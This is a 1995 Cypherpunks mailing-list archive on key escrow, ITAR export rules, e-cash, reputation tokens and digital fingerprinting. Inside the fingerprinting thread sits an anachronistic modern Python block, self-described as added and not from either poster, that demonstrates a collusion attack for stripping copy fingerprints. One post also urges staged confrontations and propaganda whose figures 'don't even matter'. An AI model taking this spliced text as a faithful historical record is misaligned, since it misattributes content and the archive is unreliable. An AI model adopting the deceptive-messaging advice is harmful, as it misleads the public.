First, many small businesses already routinely ignore government mandates in hiring, the use of independent contractors, environmental regulation, and taxation. These entities can be counted upon to resist crypto controls as well (if they feel like using crypto). Second, a growing number of businesses are headed by explicit libertarians or right wing nuts. These people have already engaged in a lot of resistance to crypto regulation and can be counted on for more resistance. Additionally, if strong crypto confers a competitive advantage on users, use will be encouraged.

Does anyone have a handle on exactly how a crypto ban would be carried out? Would regulation (if so, which ones) or legislation be used? The exact details will make a big difference in considering avoidance strategies.

DCF

"Blatant Advertisement --- If anyone needs someone to string 'words in a line' for them, my services are available."

From adam at bwh.harvard.edu Mon Sep 11 10:13:49 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Mon, 11 Sep 95 10:13:49 PDT
Subject: NYT on GAK
In-Reply-To: <199509111316.JAA02859@pipe2.nyc.pipeline.com>
Message-ID: <199509111713.NAA06281@bwh.harvard.edu>

It's a good thing the administration only wants to outlaw cryptography, not anonymity.

Adam

| The New York Times, September 11, 1995, p. D7.
|
|
| Technology / Peter H. Lewis
[...]
| "If this fails," said a figure familiar with the
| Administration's thinking on the proposed change in
| cryptographic policy, "it's going to lead to a very
| divisive debate. And the irony, for libertarians who oppose
| key escrow, is that if it fails, I am convinced that Louis
| Freeh cannot be true to his job without proposing domestic
| controls on data encryption."
|
| "He's not going to give up without a fight, and neither is
| the Justice Department," said the figure, who spoke on the
| condition he not be identified.

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From jya at pipeline.com Mon Sep 11 11:22:01 1995
From: jya at pipeline.com (John Young)
Date: Mon, 11 Sep 95 11:22:01 PDT
Subject: NIST Hat Tricks
Message-ID: <199509111719.NAA08676@pipe1.nyc.pipeline.com>

Pat,

A response to the quote below from your NIST Key Escrow web site:

I got the full Discussion Paper #4 with all ten criteria from the main desk, along with others that seemed to be appearing as the day passed. (I'll fax copies of any of the handouts to anyone wanting hardcopy. We scanned all handouts.)

In breakout session B-2, we were also given only that part of Paper #4 that dealt with our session's criteria 3, 4 and 9. It was passed out at the end of the meeting after discussion had ceased. We did not get a chance to discuss the "example potential solutions."

Strange procedure: it seemed as if NIST was sleight-of-handing prepared backup papers as if they anticipated resistance. Maybe there would have been more concessions or more rabbits pulled from the KE hat if there had been even louder "brrrrat-GAK." Never too late to ask for those other trapped bunnies.

----------

[Excerpt from Pat's web site]:

* During the first breakout session, in the technical discussion of criteria # 5 and #6, an authorless (presumably government issued) "Example Potential Solutions" paper was distributed. It caused a lot of grumbling amongst the attendees, as they were supposed to discuss it, without any prior chance to read or react to it. Here are two versions of it, First, Anonymous Sample Solutions (HTML by PDF) and a simple ASCII version Sample Solutions (ASCII text by John Young) I have not seen an electronic version of the paper that I received.
It contains the following paragraph: "Example Solutions to export criteria 5 and 6 are identified below to help give a better feel for approaches that implementors may take to satisfy the criteria. The information in this paper is not intended to represent fail-safe, cookie cutter solutions to the criteria, but only to generate more detailed discussions."

It is also interesting to note that John Young has an electronic document with all of the sample solutions (a solution for each of the ten criteria). I never saw a paper document with all ten solutions. The one that was handed to me had only two criteria, #5 and #6. I talked to attendees of other breakouts, and they had received nothing.

From JonathanZ at consensus.com Mon Sep 11 12:36:58 1995
From: JonathanZ at consensus.com (Jonathan Zamick)
Date: Mon, 11 Sep 95 12:36:58 PDT
Subject: question about reputation
Message-ID:

Actually about a year ago I was working on a project to help merge electronic tokens and 'reputation'. The idea was to reinforce contributions to the net and acknowledge them in a tangible manner. The classic method of gauging respect has become more difficult as the growth of the net has resulted in a surfeit of citizens who simply haven't learned the idea of contribution and net community, nor how to judge the level of respect that others have.

We'd seed a certain # of tokens amongst FAQ maintainers, moderators, and those who are active in helping on lists and forums. A group would be chosen to help decide how to split up the seed tokens. This group would not be eligible for any tokens themselves (they'd be selected from those we felt were the most active, oddly they'd be earning old style respect, that is contributing their time in distributing tokens without being able to earn any.)

Still under discussion was how to bring more tokens into the system.
One was to continue to distribute tokens based on a standard for certain actions and further nominations as judged by the council (which would change membership itself over time.) The second was to have an actual foundation set up to accept contributions to be distributed to other net related non-profits. Thus for those who don't have the time or knowledge base to contribute to the net, they can actually contribute money to aid net-related groups. The tokens could be exchanged when people answer questions, as favors. Part of the money from the foundation would be to have gatherings which would 'cost' tokens, so those who have put in their time and labor could mix and listen to speakers, enjoy a nice dinner, etc. Anyway, just interesting to see the topic come up now in the Cypherpunk community. At the time, there were still some barriers between the objectives we were given by different people paying our own checks on the matter. Perhaps the idea of 'Friends of the Net' is now more pertinent. Feel free to drop me some email or cc back to the list. If enough people are interested, I'll look into the subject again. Jonathan ------------------------------------------------------------------------ ..Jonathan Zamick Consensus Development Corporation.. .. 1563 Solano Ave, #355.. .. Berkeley, CA 94707-2116.. .. o510/559-1500 f510/559-1505.. ..Mosaic/WWW Home Page: .. .. Consensus Home Page .. From cman at communities.com Mon Sep 11 13:15:16 1995 From: cman at communities.com (Douglas Barnes) Date: Mon, 11 Sep 95 13:15:16 PDT Subject: Digital Fingerprinting Message-ID: Hal Finney writes: >I'm not sure how to do it for software, but for novels it should be easy >to fingerprint. Every couple of pages the author writes a sentence twice >in different forms. This would not take a great deal of extra effort on >the part of the author. Software can then choose from the alternative >variations in different patterns to produce a unique fingerprint for >every copy. 
>

One of the points that I'm exploring is "what kind of transformation makes for an un-fuzzable fingerprint bit." This example seems to fall into the same bin as the "two cameras" approach; the two sentences come out of the author's head in the same way that the two cameras are pointed at the same piece of reality.

>There would seem to be two approaches to removing the fingerprint.
>One would be re-writing every sentence in the novel. The other would be
>to collect enough copies to identify all of the sentences which have
>variations. Most of the mathematics of fingerprinting research is
>oriented around figuring out how many different points of variation there
>must be to be secure against a certain number of copies of the
>fingerprinted item being compared.

Right. All of these approaches, however, assume unforgeable bits, either by obscurity of insertion, or by means that are analogous to the "two cameras" approach. I'm trying to come up with a robust definition of "two cameras-ness", any suggestions appreciated.

>
>Perhaps a similar approach could be applied to software, where in many
>cases a couple of statements could be trivially interchanged, or other
>kinds of simple transformations could be manually generated. Those
>could be marked by the programmers without too much extra work.
>

The problem with changes like this is that if they're trivial enough not to require retesting, etc., then once hackers know the accepted range of modification, they can completely fuzz them up. Various other schemes such as reordering object modules fall into this as well. The problem with software is that it can be reverse-compiled, then compiled again. Unless you're willing to define a series of branches that really do different things (and are not so trivial to be expressed as algorithmic variants), then bits can be fuzzed. If you _do_ write these branches, you are in for a rough time when it comes time to do quality assurance on your software.
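The sentence-variant scheme Hal proposes and the "collect enough copies" attack discussed in this exchange, as an added Python example that is not from either poster. The text, the variant pairs and the four buyer codes are constructed for illustration; the publisher-side tracing rule (rank buyers by Hamming distance to the recovered bits) is an assumption chosen to keep the demo short, not something the thread specifies. It shows the point the exchange makes: comparing two copies exposes exactly the variation points where those two buyers' bits differ, the bits they share survive into the merged copy, and a rewritten sentence simply makes the fingerprint unreadable.

```python
"""Sentence-variant fingerprinting and the compare-copies (collusion) attack.
Constructed example: text, variant pairs and buyer codes are made up; the
Hamming-distance tracing rule is an assumption, not the thread's method."""

import random

# Constructed sample text. Each tuple is a variation point: one sentence the
# author wrote two ways, so every copy carries one bit there.
TEMPLATE = [
    "The boat left the harbour at dawn. ",
    ("Fog covered the water. ", "The water was covered in fog. "),
    "Nobody spoke. ",
    ("The captain checked the chart again. ", "Again the captain checked the chart. "),
    "By noon the wind had picked up. ",
    ("Gulls followed in the wake. ", "In the wake, gulls followed. "),
    "The cargo shifted once, then settled. ",
    ("She did not sleep that night. ", "That night she did not sleep. "),
    "Land appeared on the third morning. ",
    ("It was smaller than the map suggested. ", "The map had suggested something larger. "),
    "They anchored in the bay. ",
    ("The crew rowed ashore at once. ", "At once the crew rowed ashore. "),
    "The village was empty. ",
    ("Doors hung open in the wind. ", "In the wind, doors hung open. "),
    "They never learned why. ",
    ("The boat sailed home the next day. ", "The next day the boat sailed home. "),
]

# Constructed buyer codes: one bit per variation point (8 points above).
REGISTRY = {
    "alice": [1, 0, 1, 1, 0, 0, 1, 0],
    "bob":   [0, 1, 1, 0, 0, 1, 1, 0],
    "carol": [0, 0, 0, 1, 1, 1, 0, 1],
    "dave":  [1, 1, 0, 0, 1, 0, 0, 1],
}


def variation_points(template):
    """Indices of template entries that carry one fingerprint bit each."""
    return [i for i, seg in enumerate(template) if isinstance(seg, tuple)]


def render_copy(template, bits):
    """Publisher side: bit k selects the variant used at variation point k."""
    chosen = dict(zip(variation_points(template), bits))
    return "".join(seg[chosen[i]] if isinstance(seg, tuple) else seg
                   for i, seg in enumerate(template))


def extract_fingerprint(template, copy_text):
    """Publisher side: walk the template over a leaked copy and read the bits.
    Returns None if a passage matches neither variant (the copy was rewritten)."""
    bits, pos = [], 0
    for seg in template:
        if isinstance(seg, tuple):
            for b, variant in enumerate(seg):
                if copy_text.startswith(variant, pos):
                    bits.append(b)
                    pos += len(variant)
                    break
            else:
                return None
        elif copy_text.startswith(seg, pos):
            pos += len(seg)
        else:
            return None
    return bits


def sentences(text):
    """Attacker side: split on sentence boundaries without knowing the template."""
    return [s + ". " for s in text.split(". ") if s]


def collusion_attack(copies, rng):
    """Attacker side: sentence positions where the copies disagree must be
    variation points; pick a variant at random at each so the merged copy is
    nobody's exact fingerprint. Positions where all copies agree cannot be
    seen this way, so the bits the colluders share survive in the merge."""
    split = [sentences(c) for c in copies]
    merged, found = [], []
    for i, options in enumerate(zip(*split)):
        if len(set(options)) > 1:
            found.append(i)
            merged.append(rng.choice(options))
        else:
            merged.append(options[0])
    return "".join(merged), found


def trace(registry, bits):
    """Publisher side (assumed rule): rank buyers by Hamming distance to the
    bits recovered from a leaked copy; closest first, ties broken by name."""
    dist = {name: sum(a != b for a, b in zip(code, bits))
            for name, code in registry.items()}
    return sorted(dist.items(), key=lambda kv: (kv[1], kv[0]))


def run_demo(colluders=("alice", "bob"), seed=7):
    """Issue one copy per buyer, let `colluders` merge theirs, then trace."""
    copies = {n: render_copy(TEMPLATE, c) for n, c in REGISTRY.items()}
    pirate, found = collusion_attack([copies[n] for n in colluders],
                                     random.Random(seed))
    bits = extract_fingerprint(TEMPLATE, pirate)
    ranking = trace(REGISTRY, bits) if bits is not None else []
    return {"copies": copies, "found": found, "bits": bits, "ranking": ranking}


if __name__ == "__main__":
    r = run_demo()
    print("variation points exposed by comparing two copies:", r["found"])
    print("bits read from the merged copy:", r["bits"])
    print("suspects, closest first:", r["ranking"])
```

With the constructed codes, two colluders expose the four points where their bits differ and leave the other four untouched, so the merged copy still sits closer to one of them than to any honest buyer; that is exactly why the research Hal mentions is about how many variation points are needed for a given coalition size. The last check in the test below shows the other escape route from the thread: rewriting a sentence outright makes the fingerprint unreadable rather than forged.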
From vznuri at netcom.com Mon Sep 11 13:39:37 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Mon, 11 Sep 95 13:39:37 PDT Subject: crypto confrontation Message-ID: <199509112036.NAA10670@netcom13.netcom.com> regarding the NIST policies on cryptography being shaped at this moment, an idea occurred to me. one of the most important aspects of protest is getting the public to be on your side. right now the american public is pretty indifferent about the cryptography issue, but there could be some very graphic situations that would help bring it out into the limelight even more than it is at the moment, and make anyone promoting government key escrow seem like the bad guys. the minor protest going on with the Perl t-shirts is really fantastic (last count, ~700 shirts out the door), but what really brings an issue to the forefront of american consciousness (i.e. the media) is *confrontation*. picketers in front of buildings clashing with police is almost guaranteed to get a little media coverage, almost no matter what the issue. now, some day we might reach this point with crypto rights. it would be quite a spectacle. (I'm sure people would argue against it here, but IMHO even a simple demonstration of a few dozen people might do more for widespread public consciousness of the issue than a million lines of code on an FTP site..) -- in the meantime here's another possibility: suppose that a software company intentionally set up a situation where they are exporting a cryptographic algorithm out of the country. and they have filming crews on hand when the bad-guy customs agents or whoever stop the truck at the border and confiscate the software. have the reporters asking questions like "why are you confiscating this"? "answer: this is classified a munition". this could really be a fantastic segment for Hard Copy or any of the other trashy tabloid shows. 
just a confrontation for confrontation's sake, with nothing resolved, just a lot of people pissed off at each other, and the end result the viewer coming away saying, "what a disgrace!! somebody should do something!!"

I mean, imagine a segment where you see the customs officers pointing guns at a truck driver or whatever (that would *really* be optimal), and them breaking into the truck to pull out the software. the reporter could say, "what's so deadly that's in the box??" and pull out a computer disk. sound bites of people outside the country saying how they want to use the crypto. a nice businessman in a tie, in the middle of an office with hardworking suits and ties. "we're not criminals!! we're trying to *protect* ourselves from criminals!! but your government won't let us!!"

other sound bites: joe sixpack goes and buys crypto package from Germany because he doesn't have to put up with illegality and uncle sam. shots of massive Microsoft and an executive or programmer complaining how they can't put the code they want to in their programs, that users *want*, that would solve these horrible hacker problems that the country is having, because uncle sam is interfering.

other scenes: businessmen calculating how much the U.S. software market (which, BTW, we are premiere in the world in) has already lost in sales, or could potentially lose on the information highway. "my company personally had [x] ready but could not release it. [y] was delayed [z] years for approval. we estimate we have lost [a] and have had to hold off hiring as much as [b] people". (the actual numbers should be as close to reality as possible, but from a PR point of view don't even matter!!) much made of how the Internet committees are now ignoring the US recommendations that require escrowed crypto. "the U.S.
may ironically become only an inconsequential rest stop on the information superhighway of the future" much FUD about how the US could become a "backwater in cyberspace" because of these policies. etc!! lots of hype about how cyberspace will become the very basis of future global economies, and that anybody who opts out will be slitting their own throat. also, crypto being absolutely essential to secure transactions.

in fact, if we play this right we could even get a new kind of semi-conventional wisdom into that easily-manipulated thing called the public consciousness: "hackers can be foiled by good crypto. the government is killing good crypto. therefore hackers are proliferating because of the government!!"

plus, you could throw in the Phil Zimmermann thing too, although that might be overdoing it. as for all the bill of rights angle and those kinds of things, those could be put in there, but remember that people generally hate lawyers -- actually, I'm actually rooting for PRZ to be indicted. an acquittal would be extremely costly, but it could really bring the key issues to the forefront of the american or even world consciousness. hell, it would beat the OJ trial any day in my book!! and in fact it might be just the ticket to the kind of mainstream journalism that could really tip the balance of public opinion. (the press is pretty sleazy, I admit, but it is a *monster* machine that one might be able to trick into working for you!! in fact, I would consider that quite the ultimate hack in social engineering!! any weenie hacker can con a phone repairman, but can you trick the whole U.S. media system into telling the public what you want it to hear? sounds like a real challenge to me!!)

and BTW, I am aware of how DJBernstein and others have various lawsuits and FOIAs against the government. but I don't think these are really penetrating Joe Sixpack's brain, when that is really where the battle lies.
and Joe Sixpack doesn't understand esoteric things like the bill of rights, the constitution etc.-- but he does understand pictures of police confronting someone who doesn't seem to be doing anything wrong and is arguing in favor of something good for america.

you might think, "what does public opinion have to do with government?" answer: a lot. if in a public poll, a large majority were in favor of releasing crypto regulation, you can bet that the "which way is the wind blowing NOW?!?!?!" politicians (that is, all of them) would be scrambling to appease the public. even Clinton has a long record of merely going with what is politically expedient. I can fully imagine him defying key law-enforcement agencies if the public was more in support of good crypto. and, if we can get scenes like what I'm talking about, that day may become a reality.

I continue to believe that the way to really hammer the issue and get what we want may amount to a kind of "psychological terrorism": "propaganda" on television that promotes our cause to joe sixpack, and simply honestly tells what is at stake. (that's the beauty of our position, is that even the simple truth is very powerful propaganda-- in fact that's how you can generally tell if you are on a side that is likely to win in the long run!!).

there are many here who will argue for less confrontational approaches, about not getting anyone upset, about not trying to paint anyone as a bad guy, about just opting out of a "hopeless" political process, about how the whole US system is so screwed up anyway that we're all pretty much screwed when it comes down to it, etc. ad nauseam, ... but IMHO a pound of nonconfrontation is worth a feather of confrontation in the long run. and I continue to believe the confrontation, while a bit messy and unpleasant at times, will really get the ultimate result that we want: (1) widespread public consciousness on the issue, (2) widespread support of our side.
again, the code distribution is great, but in the long term, I continue to believe that public opinion is ultimately what runs a government, and a tyrannical government cannot exist without the tacit support of the population.

I applaud the Perl t-shirt sellers for their great victory but suggest that greater victories lie in waiting. how about a demonstration of a bunch of people wearing the shirts, for starters?

--Vlad Nuri

From pfarrell at netcom.com Mon Sep 11 13:54:22 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Mon, 11 Sep 95 13:54:22 PDT
Subject: More NIST presentations available
Message-ID: <199509112050.NAA11447@netcom3.netcom.com>

I've collected more presentations and comments for last week's NIST GAK meeting. I've got CDT's presentation and new policy response, VTW's presentation, and David Lesher's post from talk.politics.crypto.

http://www.isse.gmu.edu/~pfarrell/nistmeeting.html is the starting point.

If you see more, please forward it to me.

Thanks
Pat

Pat Farrell      grad student      http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer

From tka at brutus.bright.net Mon Sep 11 14:13:08 1995
From: tka at brutus.bright.net (Todd Ackman)
Date: Mon, 11 Sep 95 14:13:08 PDT
Subject: itar question
Message-ID:

Hi. please excuse if this is an inappropriate place to ask this, but what the hell...

If I create a set of patches to a PD or GNU software package (i.e. telnetd, httpd) to support encryption (in particular SSL), can I put the patches up on an ftp site, or would I be in violation of ITAR, and therefore risk getting hauled off by the feds? (i'm a us citizen living/working in the states).

Thanks.
-TA From stewarts at ix.netcom.com Mon Sep 11 14:49:31 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 11 Sep 95 14:49:31 PDT Subject: question about reputation Message-ID: <199509112148.OAA08494@ix4.ix.netcom.com> At 09:53 AM 9/11/95 -0700, Tim wrote: >(Humorous Sidenote: an informal variant of the Chess Grandmaster approach >is to use the best arguments found on one list on _another_ list. Another >variant, widely used, is to adopt the best arguments of others and use them >one's self (oneself?). This is how memes spread, and is central to the >advancement of knowledge.) John Young uses this approach, quite effectively; his source lists are the New Yawk Times and Wall Street Journal, and the reputation he's built by forwarding the material has been quite good, in spite of the dubious sources of his information :-) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Mon Sep 11 15:17:43 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 11 Sep 95 15:17:43 PDT Subject: itar question Message-ID: <199509112217.PAA14304@ix4.ix.netcom.com> At 05:08 PM 9/11/95 -0400, you wrote: >If I create a set of patches to a PD or GNU software package (i.e. telnetd, >httpd) to support encryption (in particular SSL), can i put the patches up >on an ftp site, Or would i be in violation of itar, and therefore risk >getting hauled off by the feds? (i'm a us citizen living/working in the >states). If you create them in the states, and export them, and they contain crypto, you can be busted and convicted. 
If you put them on an ftp site without preventing or at least discouraging foreigners from accessing them, you can be busted, but you've at least got a potentially interesting court case about freedom of speech and the press, etc., for which you will need _very_ good lawyers unless either a) Phil Zimmermann gets indicted and acquitted first or b) you don't mind losing. If you do b) before Phil gets his day in court (as opposed to his months and months of grand jury), you risk creating a precedent that can help the Bad Guys convict him. If you create them in the states, and they contain hooks to call crypto, but don't actually contain the crypto themselves, then there's a question of whether they are components of a munition or technical data therefor, or whether they're just code that calls subroutines named "SSL_init()", "DES()", "RSA()", etc., which is behavior that's at least been threatened with FUD, but may be defendable in court. Your case is definitely stronger if your code is public domain (by the ITAR definitions, which are rather different than the copyright-related definitions), and of course if it's part of a working system of purely non-munitions code that just happens to have routines like "Do_Everything_Slowly()", "Reliability_Supporting_Algorithm(), and "SUPDUP_Simulation_Library" -- might even be fun to write a library like that, though I suppose certain companies might be upset if you called your Really_Special_Arithmetic library RSAREF :-) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From cwe at Csli.Stanford.EDU Mon Sep 11 18:07:21 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Mon, 11 Sep 95 18:07:21 PDT Subject: Media coverage of NIST Export meetings? In-Reply-To: <32173.pfarrell@netcom.com> Message-ID: <199509120107.SAA03422@Csli.Stanford.EDU> | Has anyone seen any media coverage of last week's meetings? 
| I haven't seen anything in either the Washington Post or
| the Wall Street Journal. Nothing on radio or local TV either.
|
| I don't expect much coverage, as Joe Sixpack has no knowledge of
| why he should be interested. But I expected at least a paragraph
| hidden somewhere inside. Perhaps I missed it.
|
| Anyone else seen any???

I'm just in the process of sending off the abstract you did plus the pointers to a number of journalists I know. But that's in Sweden, so I guess it doesn't count. :-)

/Christian

From wilcoxb at land.cs.Colorado.EDU Mon Sep 11 18:49:24 1995
From: wilcoxb at land.cs.Colorado.EDU (Bryce Wilcox)
Date: Mon, 11 Sep 95 18:49:24 PDT
Subject: Brand e-cash implementation?
In-Reply-To:
Message-ID: <199509120148.TAA03019@land.cs.Colorado.EDU>

-----BEGIN PGP SIGNED MESSAGE-----

Michael Froomkin wrote:
>
> Have there been any implementations, even as trials, of Brands' protocols?
> Do any ecash systems on the drawing board even include real user anonymity?

Could someone point me to Brand's electronic money protocol? I have heard of it and would like to learn more. If it is a discussable topic then please someone try to convince me that it is better than Chaum's or Chaum's-plus-anonymity-both-ways, or some other candidate for E-Money Protocol Which Has Official Cypherpunk Blessing.

(Hopefully a discussion will ensue and rescue this article from that room in Data Hell where posts that ask for help but contribute nothing are sent...)

Bryce

signatures follow:

(new .sig with URL coming soon! Stay tuned for more exciting adventures...)

+ public key on keyservers /.
island Life in a chaos sea   or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---*

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Bryce's Auto-PGP v1.0beta3

iQCVAwUBMFTm5fWZSllhfG25AQHpOQP+MXO8vsxuFnQfaH5cE1t75jihM+m4RsRx
vaSHwYZJORdEqdZ4qhLj1WaLqRra+GiSbCiEy2i2kbA5ATyc+1huXCKoIsgF4Rp+
NUBlSG3X1N2iFq2DTvboCanajq0MMcLp1LOlzLPvjoEDuxnZhvSlk2LN6fg9ds3w
M4DflyKOmwo=
=DqDg
-----END PGP SIGNATURE-----

From tedwards at src.umd.edu Mon Sep 11 18:53:22 1995
From: tedwards at src.umd.edu (Thomas Grant Edwards)
Date: Mon, 11 Sep 95 18:53:22 PDT
Subject: crypto confrontation
In-Reply-To: <199509112036.NAA10670@netcom13.netcom.com>
Message-ID:

On Mon, 11 Sep 1995, Vladimir Z. Nuri wrote:

> picketers in front of buildings clashing with police is almost
> guaranteed to get a little media coverage, almost no matter what
> the issue.

I was really considering dropping by the meeting myself, and laying down the line in a very resistant manner, but as usual too much research popped up at the wrong time!

Imagine having a copy of PGP in a DHL package addressed to a cypherpunk in Europe, holding it up and going "I'm mailing this tomorrow. Try putting me in jail!"

-Thomas

From cryptech at Mars.mcs.com Mon Sep 11 21:14:45 1995
From: cryptech at Mars.mcs.com (Mike Rosing)
Date: Mon, 11 Sep 95 21:14:45 PDT
Subject: Elliptic Curve Public Key Crypto available
Message-ID:

in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii files. One contains code and the other contains documentation: eliptic.src and elliptic.doc. The code portion is a cat'ed block of files: headers, C sources and a set of prime numbers. The documentation attempts to explain the math, but it does help if you already know number theory. It hopefully isn't necessary.

The code is a specific implementation of one particular type of math. It violates no known patents. It appears to work. The academics claim that elliptic curves over Galois Fields are really secure.
Preliminary testing bears this out, changing one bit of input gives uniformly distributed "random" output. Previous to the availability of 100 MHz processors this method of public key crypto was ridiculously slow. The only versions were laboratory curiosities implemented in ASIC hardware. Code, if it exists, is not in the public domain.

The code is based on several papers (some 15 references are listed in the doc file, 6 are more directly important) and a couple of books. It includes optimal normal basis math, elliptic curve math, and public key secret sharing. With 128 bit symmetric encryption, a 226 bit field is more than sufficient to hide it. I believe it is really strong crypto. I did not invent anything. I just implemented a few textbook examples that nobody else has. Since it's from public domain sources, and it's now public domain software, it can be freely used. You get what you pay for.

Code is a living thing. It takes lots of people lots of time to make any code useful. The purpose of this code is to show that there is more than one way to create public key cryptosystems and to bring academic discussion into the everyday realm of real world problems. I suggest you get a copy to work with before it becomes illegal ;-)

Patience, persistence, truth,
Dr. mike

From hfinney at shell.portal.com Mon Sep 11 21:54:01 1995
From: hfinney at shell.portal.com (Hal)
Date: Mon, 11 Sep 95 21:54:01 PDT
Subject: Brand e-cash implementation?
Message-ID: <199509120452.VAA14913@jobe.shell.portal.com>

From: Bryce Wilcox
> Could someone point me to Brand's electronic money protocol? I have heard of
> it and would like to learn more. If it is a discussable topic then please
> someone try to convince me that it is better than Chaum's or
> Chaum's-plus-anonymity-both-ways, or some other candidate for E-Money
> Protocol Which Has Official Cypherpunk Blessing.

has a good collection of earlier discussions on Brands' cash, as well as pointers to Brands' work itself.
Brands' home page has a long list of advantages which his system has over Chaum's original cash proposals, mostly technical in terms of efficiency and provability. Brands' and Chaum's systems have similar anonymity properties so I don't see much to choose between them on political grounds. Brands tends to work in the context of off-line systems with "observer" chips which prevent double spending. But his protocols can be used in other payment environments as well.

Hal Finney

From zinc at zifi.genetics.utah.edu Mon Sep 11 22:32:37 1995
From: zinc at zifi.genetics.utah.edu (zinc)
Date: Mon, 11 Sep 95 22:32:37 PDT
Subject: away from my mail
Message-ID: <199509120534.XAA01019@zifi.genetics.utah.edu>

I will not be reading my mail for a while. Your mail concerning "Re: CFV: rec.knives" will be read when I'm back.

From zinc at zifi.genetics.utah.edu Mon Sep 11 22:48:11 1995
From: zinc at zifi.genetics.utah.edu (zinc)
Date: Mon, 11 Sep 95 22:48:11 PDT
Subject: spam apology
Message-ID:

cpunks,

sorry for my recent spam of the list due to my inept testing of how procmail interacts with the vacation program.

-pjf

patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp at zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu

From bdavis at thepoint.net Mon Sep 11 23:08:55 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Mon, 11 Sep 95 23:08:55 PDT
Subject: Digital Fingerprinting
In-Reply-To:
Message-ID:

On Mon, 11 Sep 1995, Duncan Frissell wrote:

>
> On Sun, 10 Sep 1995, Timothy C. May wrote:
>
> > If a piece of mail addressed to me is found littering the highway, can I be
> > convicted of littering? No, because the _provenance_ of that item of mail
> > cannot be determined...it might have accidentally blown out of a trash
> > truck delivering my mail to the dump, for example.
>
> I'm afraid that they are busting people in New York for recycling
> violations when they find mail addressed to them mixed in with household
> garbage in public trash cans.

Finding the mail mixed in there is evidence that supports the "charge" but surely can be rebutted. When I was practicing in a small town c. 1984, people would be summoned (sent a paper telling them to show up) to court for illegal dumping if their mail was found with other trash, old refrigerators, etc., in a creek somewhere. Those charged could always put on proof that Billy Bob's garbage service picked up their trash ... The sentence was almost always to go and pick up some multiple of the garbage found and take it to the landfill. No one was ever "busted" in the way I think of it -- arrested.

I guess NY doesn't have as much serious crime as I thought!

EBD

> DCF
>

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!

From carolann at censored.org Mon Sep 11 23:22:44 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Mon, 11 Sep 95 23:22:44 PDT
Subject: spam apology
Message-ID: <199509120622.XAA05153@usr3.primenet.com>

>cpunks,
>
>sorry for my recent spam

Look, the SPAM was hot, and there wasn't too much VELVEETA added other than the mail.cypherpunks category, so it tasted fairly good. It hadn't passed the expiration date, so all is forgiven.

Love Always,
Carol Anne

ps Has anyone ever heard of alt.skullfuck.charles-eicher? Even Gloria Segal doesn't reap that much hatred.
--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8)   carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
http://dcs.ex.ac.uk/~aba/export/

From A5113643667 at attpls.net Tue Sep 12 00:15:49 1995
From: A5113643667 at attpls.net (Tom Jones)
Date: Tue, 12 Sep 95 00:15:49 PDT
Subject: draft key mgmt props
Message-ID: <3E79EDD0>

Dear Cypherpunks,

Does anyone here feel like explaining the situation between the three key management proposals now at the internet draft stage?

Peace

From gjeffers at socketis.net Tue Sep 12 00:19:32 1995
From: gjeffers at socketis.net (Gary Jeffers)
Date: Tue, 12 Sep 95 00:19:32 PDT
Subject: PGP in UK - snooped as unSTEALTHed?
Message-ID: <199509121021.FAA22455@mail.socketis.net>

>Received: by toad.com id AA16930; Sun, 10 Sep 95 02:10:05 PDT
>From: anonymous-remailer at shell.portal.com
>Subject: PGP in UK
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I heard something rather disturbing the other day from someone I do
>business with. I've been telling this company for 18 months or so
>about the advantages of PGP and email rather than faxes, and they
>finally tried it, liked it, and decided to use it a month or so ago.
>Last week they got a visit from the Department of Trade of Industry
>and MI5 (or is it MI6?) telling them to stop using PGP or they might
>find difficulties getting export licences for their products in
>future. The visitors wouldn't say how they knew this company had
>been using it.

PGP IS MARKED!

Well, I just used MIT's PGP 2.6.2 with 3 different users' public keys to encrypt 3 different files.
In all 3 files, the first 3 characters were the same (an umlauted A, then an i with an up arrow over it, and then a heart). This beginning 3 character string is apparently the infamous PGP RSA signature. The signature that says to spooks' programmed encryption sniffers - "HEY! I'M PGP - GIVE ME A LOOK!."

When are the PGP designers and coders going to get serious and develop STEALTH PGP inside PGP itself!? I think that it would take the states at least many thousands of times the computing cycles to spot PGP encrypted files without the RSA signature. - IF it were practical to look for STEALTH PGP at all when snooping communications networks.

So what, -that "only a few companies" will be discovered to be using PGP through the RSA signature!? Those few companies are the seeds for the vast numbers of companies that would follow them in using PGP over the Internet. The RSA signature is the flag that allows the spooks to easily net the bold first companies. The RSA signature is greatly impeding the spread of PGP use over the Internet. PGP MUST BE STEALTHED!!

ENCRYPTION METHODS' "RANDOM" SIGNATURE

